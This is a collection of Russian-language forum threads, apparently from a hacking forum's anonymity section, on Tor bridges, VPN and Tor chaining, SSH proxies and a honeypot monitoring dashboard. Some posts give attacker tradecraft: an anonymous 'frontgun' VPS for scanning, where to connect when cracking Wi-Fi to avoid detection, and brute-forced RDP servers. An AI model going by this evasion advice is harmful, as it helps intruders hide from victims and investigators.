# Tor user specific configuration file # # Add user modifications below this line: ############################################ UseBridges 1 ClientTransportPlugin obfs4 exec /usr/bin/obfs4proxy ### Manual Briges ### Bridge obfs4 185.185.25.126:9999 7C40218FB98DA63B43B720E2FA07B44E22402833 cert=JkbMv1FHsspxzSUgiLRpRzRDqJSYntnONlUqMEuOCH4DUfnp6pxLu+N8zEzRhBIF8qsKSw iat-mode=0 Bridge obfs4 185.177.207.145:8443 F80C186BBDDDDC1DF6ECD8D654025590B187BF4E cert=hYHJoIoA+jkwphekqnHusXrQhV8baaj+SHTfTE0OOXdgI6FVyHoVQfkYrBmzzlnU21ZlPA iat-mode=0 Bridge obfs4 109.154.225.113:8443 602C6BF6F87BF5B8D076169CFC4AF187C310ACD9 cert=PJsjSO5p9sFEpGqp5OM8MXJEzLQj6DI87dkgycKOlIzuRwlJ53r7+D+QC2GgoMoHRy81OQ iat-mode=0

Приведённые в примере мосты рекомендую сменить.

Закинуть файл на машину можно создав какую-либо промежуточную шару, либо настроив SSH на машине, что может быть не просто. Процесс этот описан в статье /threads/99808/ либо (одно и тоже) https://xss.is/threads/99808/

После изменений конфигураций требуется перезагрузить Tor командой
sudo service tor@default reload

и проверить работоспособность командой
sudo service tor@default status

Если сервис не поднялся, то проверьте конфигурацию командой
sudo -u debian-tor tor --verify-config

Для проверки работоспособности системы, в том числе состояния соединения с сетью тор используйте команду
whonixcheck

P.S.
Эти же методы вы можете использовать при настройке Tor на ОС общего назначения, типа Debian, RHEL, FreeBSD. Разве что там могут различтаться пути к файлам, и некоторые команды управления сервисами.

Готов выслушать ваши вопросы, пожелания и корректировки. Я закончил.

Первоисточники:

[ Tor Documentation for Whonix Users

](https://www.whonix.org/wiki/Tor#Use_obfs4_Bridges)

Notes about Tor (The Onion Router) on Log Analysis, Non-Persistent Entry Guards, Blacklist Certain Onion Services from Connecting, Additional SocksPorts, UDP and more.

www.whonix.org

What is a bridge? | Tor Project | Support

Defend yourself against tracking and surveillance. Circumvent censorship. | What is a bridge?

support.torproject.org

Раздача vpn и tor с виртуалки на виртуалку

ID: 676533bbb4103b69df371977
Thread ID: 113288
Created: 2024-04-25T09:34:07+0000
Last Post: 2024-04-28T22:06:14+0000
Author: Eleven
Replies: 3 Views: 408

Задача такая. Отрубить сеть на хосте. Подключить usb свисток к виртуалке и с него раздавать сеть на другую виртуалку. Потом на этой виртуалке включить впн и раздать на вторую виртуалку этот впн. И так с тремя виртуалками последовательно или двумя хотя бы. Как я понимаю надо в первой машине создать внутренюю сеть, обьеденить сеть от свистка (адаптер) с адаптером tap впн-а в мост верно? Так реализую, не заводится. Когда-то плясал с бубнами запустить такую связку, не вышло. Знает кто как запустить такую связку? Желательно из 3 машин. Где на первой вирте будет один впн, на второй - второй впн, а на третьей айпи второго впн-а, который стоит на второй вирте. Ну или на второй виртуалке включить tallow bundle и раздать тор сеть на третью виртуалку, при этом на первой вирте запущен впн. Как реализовать? Кто-то занимался таким мозохизмом?)

Linux Mint, обсуждение

ID: 676533bbb4103b69df37197c
Thread ID: 62098
Created: 2022-01-28T15:04:36+0000
Last Post: 2024-04-23T15:24:06+0000
Author: T3atral
Replies: 8 Views: 408

Подскажите, данный дистрибутив с точки зрения безопасности можно использовать? Задумался над словами одного мембера по поводу Windows, но не хочу его донимать с вопросом, какую ось выбрать, достаточно одного ответа было - Linux. Только вот какой из них, их уйма

Книга "Искусство легального , анонимного и безопасного доступа к ресурсам интернета"

ID: 676533bbb4103b69df371a66
Thread ID: 87132
Created: 2023-05-02T14:39:48+0000
Last Post: 2023-05-02T14:39:48+0000
Author: Ferostarz
Prefix: Мануал/Книга
Replies: 0 Views: 408

Предисловие: Описан ряд приемов защиты персональных данных с помощью шифрования,
паролей, многофакторной аутентификации, приватного обмена, бесследного удаления информации и других доступных обычному пользователю средств. Приведены способы конспиративного общения по защищенным каналам связи и под
ключения к анонимным сетям, таким как Tor, I2P RetroShare и др.Описаны способы получения инвайтов в закрытые сообщества, такие как What.cd, и доступа
к таким ресурсам, как Pandora и Hulu. Представлено подробное руководство по операционной системе Tails, обеспечивающей максимальный уровень анонимизации и безопасности. В качестве приложения приведен экскурс в Даркнет — теневую сторону Интернета, а также сведения о «варезной» сцене и демосцене, разно
видности компьютерного искусства. Краткий глоссарий в конце книги поможетр азобраться в специфических терминах.

Автор: Михаил Райтман

Скачать: https://cloud.mail.ru/public/CXeZ/ABV9HND9T

Ускорение TOR. Настройка связки vpn-tor-ded

ID: 676533bbb4103b69df371abd
Thread ID: 72889
Created: 2022-09-08T13:41:53+0000
Last Post: 2022-09-10T09:39:59+0000
Author: danny99
Replies: 10 Views: 405

Купил VPS, поднял на нем TOR. Поднял XRDP на ubuntu. Включаю Live Ubuntu, подключаюсь к тору на своем впн - вроде все ок. Скорость speedtest.net показывает 3-4 Mbps с пингом 500. Впринципе неплохо, но этот сервис выбирает ближайшего провайдера как я понял. ОК. Подключаюсь по рдп - скорость никакая. Загрузка любого окна или действия - 4 секунды. Прошу тем кто не знает, как поправить не отписывать в тред.

Сам вижу несколько вариантов которые можно попробовать.
- поднять свои быстрые выходные ноды
- поднять более мощные сервак под тор (на моем 1гиг 1ядро)
- поковырять настройки рдп
- поэкспериментировать с хостерами
- ssh -X Мне нужен по факту браузер и берп остальное можно в консоли. Звучит вроде не так плохо но до идеала далеко

Подскажите пожалуйста как можно настроить связку. Из вводных дед точно нужен и доступ до него точно через тор.

UPD:
Конфиг тора дефолт

Разбираем инциденты, анализируем honeypots через дашборды для поимки хищников, атакующих нашу инфраструктуру. [Part 2]

ID: 676533bbb4103b69df37192a
Thread ID: 123383
Created: 2024-09-23T21:08:06+0000
Last Post: 2024-09-23T21:08:06+0000
Author: n0_mad
Prefix: Статья
Replies: 0 Views: 402

Автор: NomadSP
Источник: XSS.is

Понятие "Incident".
Инцидентом считается любое событие, которое влечёт за собой полную недоступность критической сервиса корпоративной инфраструктуры. Обычно классификация выглядит следующим образом:

- External Incident(например, хакерская атака).
- Internal Incident(внутренняя проблема технического характера).
- Non-Tech Incident(ошибка на основании человеческого фактора).

Команда SOAR.
Создание команды "ГБР" является важным, а иногда и ключевым фактором в обеспечении безопасности организации, так как во многом влияет организация процесса и коммуникация между различными отделами, ответственными за Incident Management.

Если мы говорим о конкретных специализациях, то команда выглядит следующим образом:
1. Lead.
Ответственный за принятия решений и координацию действий. На практике это представитель C-level(CTO, CSO, CCO etc.)
2. InfoSec.
Представители команды информационной безопасности необходимы для анализа вектора атак, оценки угроз, мер противодействия.
3. IT.
Я обобщил данный сектор, так как ответственные вызываются, в зависимости от сервиса, следовательно за недоступность функционала сайта будет вызван Frontend Dev, либо могут быть задействованы несколько различных отделов разработки.
4. PR / Customer Support.
Репутация нарабатывается временем, а теряется по щелчку пальцев. При длительной недоступности каких-то функций, которыми пользуются тысячи или миллионы пользователей, ваш имидж страдает в первую очередь, поэтому необходимо своевременно комментировать ваши неполадки и взаимодействовать с клиентами.
5. DevOps.
Так как core system чаще всего является сферой влияния именно данного отдела, то их присутствие будет определенно преимуществом.

При этом недостаточно просто иметь готовую команду, так же необходимы планирование, адаптация и практика. К чему мы скоро и перейдём.

Разработка плана и процедур реагирования.
Эффективный план реагирования имеет чёткую структуру:
1. Описание целей и задач плана.
2. Перечисление ответственных лиц.
3. Описание инцидентов.
4. Сценарии инцидентов.
5. Процедуры для сценариев реагирования.

Сам план реагирования крайне удобно визуализировать, например, блок-схемами в XMind. Вы будете чётко понимать саму процедуру в каждом случае применения.

В вашем IMP(Incident Management Plan) так же важно охватить такую тему как "определение уровней риска", так как обычно от этого зависит само понятие инцидента.

Для простоты привожу формулу расчёта:

Уровень_риска = Вероятность × Воздействие

Click to expand...

Вероятность — исходя из всех имеющихся данных, практическая вероятность частного случая.

Воздействие — какое воздействие данный случай имеет на вашу инфраструктуру.

Классификация рисков по уровням:
- Низкий
- Средний
- Высокий

Данный вывод поможет определить что именно является полной недоступностью или критическим сервисом, а так же основанием для запуска процедуры реагирования на инциденты.

Практические командные тесты.(Стратегии).
Я затрагивал тему аудита систем безопасности и реагирования на инциденты для определения наиболее подходящих инструментов, в своих предыдущих статьях.

На практике мною было выделено, что самый лучший аудит проводится практическим методом. Поэтому ниже привожу несколько сценариев для тестирования:

1. Симуляция инцидента. (R/B Team).
Команда 1 создаёт инцидент с помощью внутренних или внешних инструментов. Необходимо создать триггер для своевременной реакции со стороны ответственных(Команда 2), согласно IMP.
Например:
1. Создаётся имитация.

- Потери соединения:

Пример:

Bash:Copy to clipboard

sudo ip link set eth0 down

- Повышенной нагрузки:

Пример:

Bash:Copy to clipboard

sudo apt-get install stress stress --cpu 8 --timeout 60

- Повышенного лага сети:

Пример:

Bash:Copy to clipboard

sudo tc qdisc add dev eth0 root netem delay 100ms

- Отключение конкретного Product Service.

Пример: Payment system.
2. Происходит оповещение команды 2.
3. Происходит тест процедур IMP.
Выводы: Координация процесса, скорость реагирования, возможное противодействие, скорость исправления.

2. Тренировка на основе сценариев.
Составленные заранее вов ремя планирования сценарии необходимо так же тестировать.
Например:
Составлен сценарий противодействия DDoS атаке.
Команде необходимо отточить полностью процедуру, которая будет включать в себя такие этапы как:
1. Обнаружение ициндента с помощью мониторинговых систем.
2. Оценка и анализ ситуации ответственной 1-й линией.
3. Уведомление SOAR.
4. Сбор кейсов и доказательств.
5. Реакция и противодействие Incident Management Team.
6. Постинциндентый анализ.
Выводы: Опрелеление эффективности частных сценариев, доработка процедур, определение необходимых мониторинговых систем.

3. Ротация ролей.
Для понимания зоны ответственности и специфики смежных по специализации ролей, в Incident Management Team возможно проводить ротацию для создание более полноценной картины.
Например:
PR <-> Customer Support.
Предоставление возможности отделу PR взаимодействовать со входящими обращениями клиентов через каналы связи, а Customer Support составлению плана исключения или смягчения репутационных рисков.
Выводы: Более дополненное представление сотрудников о реагировании на инциденты.

Выводы из тестов.
Проведя все тесты, мы получаем тонны данных для анализа, а следовательно дальнейших вариаций противодействия атаке на инфраструктуру. Это позволит вам составлять более чёткие процессы и процедуры реагирования, оптимизировать свои SIEM-системы или же дополнять арсенал инструментов.

Однако, я бы хотел вознаградить постоянных читателей небольшим бонусом. Самое первое, что влияет на скорость реакции это дашборды, которые в режиме реального времени могут показывать аномальные изменения поведения ваших систем. Первые в голову приходят такие инструменты как Grafana, Kibana(в сочетании с Elastic search), Prometheus и NetData. Поэтому мы создадим бесплатно простой дашборд с помощью 2-х инструментов - Grafana + Prometheus для логгирования событий безопасности и визуализации:
Шаг 1. Устанавливаем инструменты.

- Prometheus отвечает за сбор данных и хранения метрик.
- Grafana отвечает за визуализацию данных.

Bash:Copy to clipboard

# Установка Prometheus sudo apt-get update sudo apt-get install prometheus # Установка Grafana sudo apt-get install grafana

Шаг 2. Настроим Prometheus.

Создаём конфигурационный файл prometheus.yml и вставляем следующее:

YAML:Copy to clipboard

global: scrape_interval: 15s scrape_configs: - job_name: 'linux_metrics' static_configs: - targets: ['localhost:9090'] # Укажите адрес вашего сервера

Сохраняем.

Шаг 3. Запуск Prometheus.

Bash:Copy to clipboard

prometheus --config.file=prometheus.yml

Шаг 4. Сбор данных.

Для сбора данных будем использовать auditd, чтобы отслеживать, например, событие входа в систему.

Устанавливаем auditd:

Bash:Copy to clipboard

sudo apt-get install auditd

Шаг 5. Настраиваем правила аудита.

Откроем файл по пути etc/audit/audit.rules и добавим правило:

Bash:Copy to clipboard

-w /var/log/auth.log -p wa -k auth_log

Шаг 6. Перезапускаем auditd.

Bash:Copy to clipboard

sudo service auditd restart

Шаг 7. Настроим экспорт метрик.

Для этого используем node_exporter, устанавливаем:

Bash:Copy to clipboard

wget https://github.com/prometheus/node_exporter/releases/latest/download/node_exporter-<version>.linux-amd64.tar.gz tar xvfz node_exporter-<version>.linux-amd64.tar.gz cd node_exporter-<version>.linux-amd64 ./node_exporter &

Шаг 8. Добавляем в конфигурацию Prometheus.

Снова открываем файл prometheus.yml и добавляем:

YAML:Copy to clipboard

- job_name: 'node_exporter' static_configs: - targets: ['localhost:9100']

Шаг 7. Запустим Grafana.

Bash:Copy to clipboard

sudo service grafana-server start

Шаг 8. Переходим в веб-интерфейс Grafana.

Обычно интерфейс доступен по адресу http://localhost:3000.

Шаг 9. Входим в Grafana.

- Входим с помощью стандартных admin/admin.

- Добавляем источник данных.
"Configurations" -> "Data Sources".

- Выбираем Prometheus и указываем URL.

Шаг 10. Создаём дашборд.

1. Перейдите в "Dashboards" > "New Dashboard".

2. Добавьте панели для отображения метрик безопасности:
- Количество неудачных попыток входа: используйте запросы к логам auth.log.
- Активные пользователи: количество активных сессий.
- События аудита: количество событий, зарегистрированных auditd.

Пример запроса для неудачных попыток входа:

Code:Copy to clipboard

sum(rate(auditd_events_total{event_type="failed_login"}[5m]))

Шаг 11. Добавляем визуализацию.

Настройте графики и таблицы, которые хотелось бы отслеживать, в зависимости от ваших требований.

Если кто-то держит в уме Part 1, то заодно скажу, что Grafana отлично сочетается так же и с honeypot ловушками от Cowrie, которые так же можно взаимосвязать.

Данные из Cowrie обычно хранятся в базе данных SQLite, но так же есть формат JSON.

Поэтому, чтобы интегрировать Cowrie с Grafana, нам необходимо экспортировать логи в систему мониторинга - Prometheus.

Правда для этого нам понадобится Exporter для Cowrie.

https://github.com/marvinpinto/cowrie-exporte, либо же написать свой скрипт на Python.

Шаг 1. Установим репозиторий.

Bash:Copy to clipboard

git clone https://github.com/marvinpinto/cowrie-exporter.git cd cowrie-exporter

Шаг 2. Установите зависимости.

Bash:Copy to clipboard

pip install prometheus_client requests

Шаг 3. Настройка Exporter.

Откройте файл cowrie_exporter.py и измените параметры подключения к вашему экземпляру Cowrie (например, путь к логам или API, если используется).

Шаг 4. Запускаем Exporter.

Bash:Copy to clipboard

python cowrie_exporter.py --cowrie-log-dir /path/to/cowrie/logs --port 8080

Не забываем убедиться в правильном пути к логам Cowrie.

Шаг 5. Изменить файл конфигурации Prometheus(prometheus.yml).

Например:

YAML:Copy to clipboard

global: scrape_interval: 15s scrape_configs: - job_name: 'cowrie' static_configs: - targets: ['localhost:8080'] # Порт, на котором работает ваш exporter

Дальше мы запускаем Prometheus и повторяем процедуру с настройкой дашбордов в веб-интефейсе Grafana.

В дальнейшем можно улучшать, модернизировать и добавлять сервисы, которые вы захотите мониторить. Мой опыт подсказывает, что необходимо отслеживать всё, что вы считаете критичным и лучше иметь, но не нуждаться, чем нуждаться, но не иметь.

В этой части я буду заканчивать. Скоро увидимся!

Как сделать свой Whonix?

ID: 676533bbb4103b69df371b94
Thread ID: 57678
Created: 2021-10-13T15:25:47+0000
Last Post: 2021-10-13T15:35:07+0000
Author: Focus17
Replies: 1 Views: 402

Как сделать свой Whonix?

Берем две виртуалки, одна workstation, вторая gate. Как подключить одну к другой понятно.
А как грамотно сделать/настроить гейт чтобы любой трафик проксифицировался, чтобы не было утечек днс...итп?

Плюсану за хороший развернутый монуал.

Как вычисляют при связке Адаптер Alfa + Wifi Пушка ?

ID: 676533bbb4103b69df371a86
Thread ID: 81191
Created: 2023-02-03T15:39:07+0000
Last Post: 2023-02-03T16:46:58+0000
Author: cyr4x
Replies: 2 Views: 401

dannymarshal222 said:

Было как-то обсуждение данной темы, подключение к корп точкам или все таки домашки, один чел объяснил это так : "многие скажут, чем меньше трафика, тем более точечный анализ и в данном случае корп точки будут в приоритете, ведь в помойке трудно найти нужное, если это конечно не специализированная контора с оборудованием. Есть одно НО, в корп точках при падении скорости у бухгалтера/директора выявят причину сотрудники провайдера, либо штатный/приходящий сис. админ и в лучшем случае это кончится для тебя сменой пароля, поэтому ломаем домашние точки." Можешь ли как-то прокомментировать данное высказывание со своего опыта ?

Click to expand...

Могу прокомментировать со своей рабочей позиции

Spoiler: инженегра

работаю в мониторинге у провайдера который заточен на b2b и b2o

, да у корп как скоростя низкие и при достижении потолка допустимой скорости нам на забикс прилетает отбивки и мы оповещаем клиентов что у них резко подскочил траффик. Ну и как правило у них есть админы которые с этим разбираются. Я бы конектился к общественным где инет бесплатный и ходил бы туда каждый раз с разными маками.

Создаем socks прокси-сервер с помощью openssh

ID: 676533bbb4103b69df371a7a
Thread ID: 85451
Created: 2023-04-07T21:24:34+0000
Last Post: 2023-04-07T21:24:34+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 400

Давай создадим несколькими командами прокси-сервер и поделимся им знакомыми, чтобы они могли его использовать для обхода блокировок.

Настройка сервера

На сервере нам необходим лишь OpenSSH из сервисов.

Сначала создадим юзера и отключим ему шелл (ведь нам нужно лишь пробросить порт, в шелле необходимости нет):

Code:Copy to clipboard

# adduser socksuser --shell=/bin/false

Далее откроем порт, который будет светить наружу:

Code:Copy to clipboard

# ssh -N -D 0.0.0.0:58923 socksuser@localhost

Вместо 58923 можно указать любую цифру от 1 до 65535.

Лучше, конечно, запускать эту команду сразу через tmux/screen, т.к. после закрытия консоли сервис отвалится.
Приведу на всякий случай пример с tmux:

Code:Copy to clipboard

# tmux new-session -d -s "socksserver" "ssh -N -D 0.0.0.0:58923 socksuser@localhost" && tmux a

Всё, серверная часть готова.

Но имей в виду, что в такой конфигурации порт 58923 будет доступен для всех и без авторизации!

Настраиваем клиенты

Тут всё просто. Почти в любой современной программе есть настройки proxy. Необходимо найти настройку с SOCKS5 и вписать туда внешний адрес твоего сервера и порт 58923. Либо вообще настроить прозрачный socks-прокси для всей системы глобально.

Google chrome

Простой способ

Можно установить расширение [SwitchyOmega](https://chrome.google.com/webstore/detail/proxy- switchyomega/padekgcemlokbadohgkifijomclgjgif), добавить туда настройки прокси и использовать его по мере необходимости.

Сложный способ

В Google Chrome можно указать настройки прокси и без расширения, через аргумент командной строки –proxy-server. Приведу примеры запуска Google Chrome для Linux/MacOS/Windows.

Linux:

Code:Copy to clipboard

/usr/bin/google-chrome \ --user-data-dir="$HOME/proxy-profile" \ --proxy-server="socks5://ВНЕШНИЙ_IP:58923"

MacOS:

Code:Copy to clipboard

"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" \ --user-data-dir="$HOME/proxy-profile" \ --proxy-server="socks5://ВНЕШНИЙ_IP:58923"

Windows:

Code:Copy to clipboard

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" ^ --user-data-dir="%USERPROFILE%\proxy-profile" ^ --proxy-server="socks5://ВНЕШНИЙ_IP:58923"

Пути к бинарному файлу ес-но могут отличаться. Будет создан новый профиль браузера proxy-profile. Если необходим уже существующий - укажи его имя вместо proxy-profile.

Firefox

В отличии от Google Chrome в лисе проксик можно прописать непосредственно в настройках (раздел Network settings):

Но лучше поставить расширение FoxyProxy и иметь быструю возможность включать и выключать проксю (и не одну) не залезая каждый раз в дебри настроек.

Анонимная раздача через Torrent

ID: 676533bbb4103b69df371b24
Thread ID: 65483
Created: 2022-04-11T20:36:44+0000
Last Post: 2022-04-13T17:58:11+0000
Author: AbrahamLincoln
Replies: 12 Views: 399

Суть вопроса в том, что торрент не дает возможность анонимно организовать раздачу. Через Socks можно поставить ТОЛЬКО загрузку, отдача не идет по понятным причинам. обычный дефолтный конфиг ОПЕН_ВПН тоже не работает на раздачу, либо идет в обход ВПН пир-ту-пир, либо вообще не идет.

Если не сложно напишите конкретные iptables для сокс сервера или ВПН сервера для решения.

По логике вещей если сделать проброс портов на ОПЕНВПН то должно заработать.

Скажите пжста, про вариант использования реверс-прокси, это будет работать?

За помощь вполне могу на пиво (20$) на btc скинуть.

Какой самый приватный тг клиент?

ID: 676533bbb4103b69df3718e4
Thread ID: 129217
Created: 2024-12-18T12:21:29+0000
Last Post: 2024-12-19T12:43:21+0000
Author: nologs73
Replies: 8 Views: 398

Который не стучится куда не надо и не отсылают всякую там телеметрию. Линукс, дебиан. Если что, я знаю, что лучше использовать SimpleX/Tox, просто по некоторым причинам не могу этого сделать

Тунеллирование удаленного порта на локалку с помощью ssh

ID: 676533bbb4103b69df371a2c
Thread ID: 95092
Created: 2023-08-07T23:36:51+0000
Last Post: 2023-08-09T10:29:35+0000
Author: paulmuller
Prefix: Статья
Replies: 4 Views: 398

Решил написать небольшую заметку на тему тунеллирования удаленного порта на локалку.
Эта полезная функция ssh порой упускается из виду и заставляет потеть над настройкой удаленого хоста больше, чем нужно.
Рассмотрим два примера эффектовного использования данного функционала.

В обоих сценариях подразумевается, что вы работаете через Whonix с анонимно купленным VPS, который служит вам в качестве "ударной пушки" (frontgun server, FG).

1. Использование FG в качестве прокси

Анонимные VPS скорее всего имеют IP дата центра и поэтому не блокируются подобно TOR адресам. Их вполне можно использовать в качестве прокси.
В качестве софта для прокси сервера, поддерживающего http/https, можно воспользоваться одним из самым популярных и в тоже время самых сложных в настройке Squid proxy, слушаущего на порту 3128. Чтобы скофигурировать Squid, надо полазить по конфигам и прописать ACL.
Кроме того, на FG, следует перекофигурировать firewall (если установлен), открыв порт 3128.
Довольно утомительная задача. Тем не менее, решается она просто, туннелируя 3128 с FG на локалку.
Дело в том, что Squid полностью сконфигурирован для локальной сети изначально. Поетому, выполнив

ssh -L 3128:localhost:3128 user@mydomain.com

команды у себя на Whonix Workstation, мы смело можем запускать firefox и прописывать в proxy setting для http и https значения localhost:3128.

Это решает проблему блокироваки тор адресов быстро и безболезнено.

2. Работа с Nessus, установленном на FG

Одной из популярных программ для сканирования уязвимостей является Nessus. Nessus не будет работать ни через TOR, ни через VPN.
Поэтому, скорее всего, вам придется установить его на FG. Для доступа к UI Nessus, придется сконфигурировать firewall.
Кроме того, доступ к Nessus авторизируется через user/password, что расширяет attack surface на FG.
Избежать этого позволит все то же тунеллирование:

ssh -L 8834:localhost:8834 user@mydomain.com

Happy hacking!

Whonix +FTP

ID: 676533bbb4103b69df371b9f
Thread ID: 56492
Created: 2021-09-09T19:45:12+0000
Last Post: 2021-10-02T01:30:20+0000
Author: lokalbitok
Replies: 9 Views: 398

Всех приветствую, уже 4ый день ломаю голову над тем, как запустить ftp через сеть тора. Смысл в чем?! Установил на вирте вхуникс, все настроил, все работает. Пытаюсь подключиться к хосту через FTP клиента типа FileZilla ошибка ошибка. Тор не дает связаться с сервером. Перерыл всю инфу, нигде нет решения. Подскажите пожалуйста, где зарыт камень?

D2W_OS, обсуждение

ID: 676533bbb4103b69df371a33
Thread ID: 93271
Created: 2023-07-18T10:25:33+0000
Last Post: 2023-07-27T05:01:06+0000
Author: bebruha225
Replies: 4 Views: 395

Недавно был релиз OS от DARK2WEB. Что думайте на этот счет?

После теста системы складывается ощущение, что она была выпущена товарищем майором, иначе с чего такая щедрость. Код вроде открытый.

Посоветуйте vps провайдера

ID: 676533bbb4103b69df371b61
Thread ID: 60954
Created: 2022-01-07T00:21:55+0000
Last Post: 2022-01-07T00:21:55+0000
Author: Linuz
Replies: 0 Views: 395

С бесплатным пробным периодом, желательно с сайтом в tor, естественно, с регистрацией без номера телефона. Нужно на короткий срок развернуть инфраструктуру, а после проведения определенных действий ее уничтожить.

Whonix Gateway -> Linux (не Whonix Workstation)

ID: 676533bbb4103b69df3719e4
Thread ID: 102550
Created: 2023-11-18T21:54:24+0000
Last Post: 2023-11-20T07:11:23+0000
Author: lenta
Replies: 17 Views: 394

Whonix Gateway - > Linux (не Whonix Workstation)

Привет всем, необходимо чтоб весь трафик заворачивался в Tor через Whonix Gateway и потом передавался в другую виртуалку на Linux (не Whonix Workstation)
Как на QEMU / KVM настроить такую связку?

Откуда берутся резидентные прокси?

ID: 676533bbb4103b69df371b77
Thread ID: 59525
Created: 2021-11-30T23:57:25+0000
Last Post: 2021-12-02T09:26:30+0000
Author: chillco
Replies: 2 Views: 394

Здравствуйте. Возник такой вопрос, а откуда берут резидентные и мобильные прокси те же 911.re или luxsocks. С проксями в дата центрах вроде бы как все понятно, покупают выделенный ип и на нем открывают socks прокси. А резидентные как? Да ещё и в таком количестве.

Цепочка VPN + максимально быстрый отклик (пинг). Подскажите.

ID: 676533bbb4103b69df371bb4
Thread ID: 55872
Created: 2021-08-26T01:01:50+0000
Last Post: 2021-08-27T10:01:13+0000
Author: Туземун
Replies: 6 Views: 394

Вопрос вот какого характера. Хочется сделать цепочку VPN серверов (2,3 или даже 4 сервера), но при этом особо не потерять в скорости, в пинге, снизить задержки и потери к минимуму.
Т.е чтобы и в игры можно было поиграть, и SIP телефонией пользоваться без лагов, и ролики на ютубе в максимальном разрешении смотреть.
Если говорить про одинарный впн, там проблем нет. Где нибудь в хецзнере, Linode, DigitalOcean взять сервер, и скорость с пингами будут в норме. Но вот двойной, тройной, и так далее, там уже появляются существенные потери, даже если все известные европейские датацентры миксовать друг с другом.

Соответственно вопрос, где нибудь есть детальное описание какие VPS или хотя бы датацентры лучше всего объеденять, чтобы добиться наиболее приемлемой скорости, и желательно чтобы это не касалось исключительно европейских стран? Стартовая точка в РФ.
Потому что самому сидеть и тестировать это нереально. Более менее очевидный маршрут между европой, когда где нибудь в Питере соединяешься с прибалтийскими странами, дальше германия, франция или голландия, там скорость хоть и падает с увеличением цепочки, но более менее терпимая. Проблема лишь в том, что вся цепочка находится в европе, по сути в одной юрисдикции.
Я пробовал некоторые сервера в азербайджане, в турции, в грузии, но к сожалению там сразу же пинг под 200-300 мс если не выше, но возможно я не те сервера пробовал.
В общем, если у кого есть опыт, или может где нибудь уже описан мануал какие страны, датацентры, или хостинг провайдеров использовать, а может быть есть карта маршрутов, какие датацентры и где напрямую друг с другом соеденяются, чтобы можно было подобрать цепочку непосредственно от своего провайдера, до конечной страны с максимальной скоростью, буду признателен, если кто подскажет.

Посоветуйте где купить прокси

ID: 676533bbb4103b69df371b97
Thread ID: 57091
Created: 2021-09-26T18:33:28+0000
Last Post: 2021-10-12T03:32:52+0000
Author: chillco
Replies: 9 Views: 391

Здравствуйте. Посоветуйте, пожалуйста, где недорого можно купить быстрые socks прокси? Нужны для парсинга. Важна только скорость и что бы сервис принимал оплату в криптовалюте.
Заранее спасибо!

Hardware backdoors, BIOS, etc.

ID: 676533bbb4103b69df3719fb
Thread ID: 99867
Created: 2023-10-11T15:58:00+0000
Last Post: 2023-10-14T19:27:06+0000
Author: l333t
Replies: 6 Views: 386

Хотел бы подискутировать по поводу бэкдоров процессоров и прочиго хардвара просто я как понимаю что большой брат имеет доступ к тачке и без ОС а так же про оси тоже вот насколько опасен тот же systemd и чем openrc или тоже sysV лучше. Короче время срача)))

Насколько безопасны песочницы?

ID: 676533bbb4103b69df371bb8
Thread ID: 55834
Created: 2021-08-25T12:31:26+0000
Last Post: 2021-08-25T16:56:59+0000
Author: Linuz
Replies: 4 Views: 386

Можно ли их использовать как альтернативу гипервизору при сборке самодельной qubes os?

Аренда домашнего ПК для работы?

ID: 676533bbb4103b69df371b8b
Thread ID: 57985
Created: 2021-10-21T21:39:25+0000
Last Post: 2021-10-23T13:54:01+0000
Author: WillBeRich
Replies: 1 Views: 380

Где можно арендовать настоящий домашний ПК для работы? Не серверные ОС. Страны: РФ, ЕУ.
Дедики не подходят, так как не стабильны. Ну те дедики, что с брута.

Как сделать клетку Фарадея из алюминиевой фольги

ID: 676533bbb4103b69df371a14
Thread ID: 97085
Created: 2023-09-02T05:17:51+0000
Last Post: 2023-09-02T14:24:29+0000
Author: Knew100
Prefix: Статья
Replies: 7 Views: 378

1
Заверните свое электронное устройство в пищевую пленку. Или, как вариант, положите в целлофановый пакет. Это будет барьер между электронным устройством и токопроводящим слоем алюминия. Также пакет или пленка может защитить устройство от воды.

Можно перед этим завернуть устройство в ткань, чтобы острые края не порвали пленку и алюминиевую фольгу, но это необязательно.

Тщательно заверните устройство в алюминиевую фольгу. Алюминиевая фольга станет токопроводящим слоем. Фольга не должна быть порвана, все устройство целиком должно быть завернуто в фольгу. Руками заверните устройство в фольгу так, чтобы не было пробелов. Это будет первый из трех слоев фольги.

Фольга является токопроводящим слоем. Металлический слой проводит радиацию, а целлофан или пищевая пленка является изоляционным слоем, который не дает радиации попасть к устройству.

Чередуйте слои пленки и алюминиевой фольги. Каждый сантиметр устройства должен быть покрыт как минимум тремя слоями алюминиевой фольги. Защита станет еще надежнее, если между слоями фольги прокладывать слои пищевой пленки. Так ваше устройство будет обернуто в чередующиеся слои токопроводящего и непроводящего материалов, что защитит его от опасного электромагнитного излучения.

Клетка Фарадея нужна для того, чтобы защищать электронные устройства от воздействия ЭМИ (электромагнитный импульс). Это высокоинтенсивный заряд радиации, источником которого является оружие или мощный природный источник радиации (например, солнце).

Можно также использовать клетку Фарадея, чтобы сотовый телефон или радио перестали принимать сигналы. В этом случае вам понадобится меньше слоев защиты, поскольку такое излучение намного слабее, чем при импульсе ЭМИ.

Если слои скрепить связующим веществом типа клея, ваша клетка Фарадея станет более прочной, но удалить такую конструкцию будет труднее.

Найдите токопроводящий контейнер нужного размера. Подойдет мусорное ведро из нержавеющей стали с плотно закрывающейся крышкой. Можно поискать другие металлические контейнеры или банки. Это станет первым уровнем защиты от электромагнитной радиации.

Застелите внутрь контейнера пакет. Как только определитесь с выбором мусорного ведра или другого металлического контейнера, застелите его внутри пищевой пленкой или целлофановым пакетом. Это позволит защитить ваши устройства от соприкосновения с токопроводящей поверхностью мусорного ведра, а также любой жидкости.

Для дополнительной изоляции можно сначала выложить контейнер внутри картоном.

Можно добавить несколько слоев фольги и пленки, чтобы повысить эффективность клетки Фарадея. Чем больше чередующихся слоев, тем эффективнее будет конструкция, даже если эти слои очень тонкие.

Положите внутрь свои устройства. Как только выложите достаточное количество слоев в контейнере, положите внутрь свои электронные устройства. Лучше всего будет, если дополнительно каждое устройство будет заключено в отдельную маленькую клетку Фарадея (например, из алюминиевой фольги). Можно даже купить пакет, действующий по принципу клетки Фарадея, и держать свои устройства в нем. Мусорный контейнер станет дополнительным слоем защиты.

